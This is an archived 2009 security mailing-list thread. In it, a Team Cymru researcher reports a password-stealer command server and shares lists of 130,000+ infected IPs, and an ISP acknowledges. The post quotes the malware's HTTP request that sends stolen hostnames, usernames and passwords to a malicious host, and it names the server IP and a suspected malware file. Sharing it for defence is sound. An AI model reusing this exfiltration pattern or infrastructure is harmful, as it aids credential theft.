[nsp-sec] 130K+ Infected Ips on ~3600 ASNs

Philip Taylor Philip.Taylor at rci.rogers.com
Thu Oct 1 15:09:10 EDT 2009 

ACK AS812, AS3602

Thanks

-----Original Message-----
From: nsp-security-bounces at puck.nether.net
[mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Stephen Gill
Sent: Thursday, October 01, 2009 1:48 PM
To: NSP-SEC List
Subject: [nsp-sec] 130K+ Infected Ips on ~3600 ASNs


----------- nsp-security Confidential --------

Hi Team,

This password stealer head end IP appears to be quite busy:

76.73.37.250

We're working w/ the ISP on takedown, however in the meantime here is a
list of 130K+ infected Ips seen talking to it primarily via TCP 80
(reporting stolen credentials) and UDP 7006 - UDP 7012.  I don't
anticipate an IP takedown to last forver because they can likely
re-route via DNS.

    ASN list:
    https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt

    Infected IP list:
    https://www.cymru.com/nsp-sec/Owned/stealer/
    eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt

Timestamps in UTC.

Some clarification on the formatting:

3       | 18.26.4.9        | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS
-
Massachusetts Institute of Technology

The timestamp column will begin with a U or a T.  U is for UDP, T for
TCP. When possible we've preferred to list out a T if we have seen any
TCP 80 traffic from the client IP in question.

It looks like the malware on the client may choose its source IP address
since we noticed some RFC 1918 traffic so it is possible the UDP data
will not match in all cases.  I cannot guarantee that the UDP traffic is
not part of some type of actual software but it sure looks suspicious.
Here is a public URL for reference:

    http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html

As there is UDP involved we cannot guarantee that there are 0 spoofed
Ips, but on the TCP side that is another matter.

HTTP credential stealing looks something like this:

GET 
/pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USERN
AME&
p=STOLEN_PASSWORD HTTP/1.1
User-Agent: Mozilla/4.0 (compatible).
Host: hotshows.org.
.


Cheers,
-- steve

-- 
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com




_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security

Please do not Forward, CC, or BCC this E-mail outside of the
nsp-security community. Confidentiality is essential for effective
Internet security counter-measures.
_______________________________________________
-------------- next part --------------

This e-mail (and attachment(s)) is confidential, proprietary, may be subject to copyright and legal privilege and no related rights are waived. If you are not the intended recipient or its agent, any review, dissemination, distribution or copying of this e-mail or any of its content is strictly prohibited and may be unlawful. All messages may be monitored as permitted by applicable law and regulations and our policies to protect our business. E-mails are not secure and you are deemed to have accepted any risk if you communicate with us by e-mail. If received in error, please notify us immediately and delete the e-mail (and any attachments) from any computer or any storage medium without printing a copy.

Ce courriel (ainsi que ses pi?ces jointes) est confidentiel, exclusif, et peut faire l?objet de droit d?auteur et de privil?ge juridique; aucun droit connexe n?est exclu. Si vous n??tes pas le destinataire vis? ou son repr?sentant, toute ?tude, diffusion, transmission ou copie de ce courriel en tout ou en partie, est strictement interdite et peut ?tre ill?gale. Tous les messages peuvent ?tre surveill?s, selon les lois et r?glements applicables et les politiques de protection de notre entreprise. Les courriels ne sont pas s?curis?s et vous ?tes r?put?s avoir accept? tous les risques qui y sont li?s si vous choisissez de communiquer avec nous par ce moyen. Si vous avez re?u ce message par erreur, veuillez nous en aviser imm?diatement et supprimer ce courriel (ainsi que toutes ses pi?ces jointes) de tout ordinateur ou support de donn?es sans en imprimer une copie.

More information about the nsp-security mailing list